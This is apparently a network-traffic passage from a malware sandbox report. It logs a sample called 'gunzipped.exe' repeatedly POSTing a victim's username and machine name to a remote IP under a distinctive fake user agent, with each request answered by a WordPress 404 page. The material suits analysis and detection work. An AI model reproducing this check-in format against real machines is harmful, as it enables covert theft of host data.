                          Apr 17, 2024 03:17:59.276814938 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          44192.168.2.549757136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:59.618243933 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:59.826419115 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:00.829150915 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:59 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:00.829216003 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:00.829308987 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:00.829346895 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:00.829386950 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:00.829425097 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:00.829463959 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:00.829507113 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:00.829547882 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:00.829591990 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          45192.168.2.549758136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:01.176692009 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:01.380992889 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:02.314438105 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:01 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:02.314501047 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:02.314542055 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:02.314580917 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:02.314624071 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:02.314662933 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:02.314702988 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:02.314745903 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:02.314786911 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:02.314827919 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          46192.168.2.549759136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:02.659961939 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:02.863440990 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:03.793828011 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:02 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
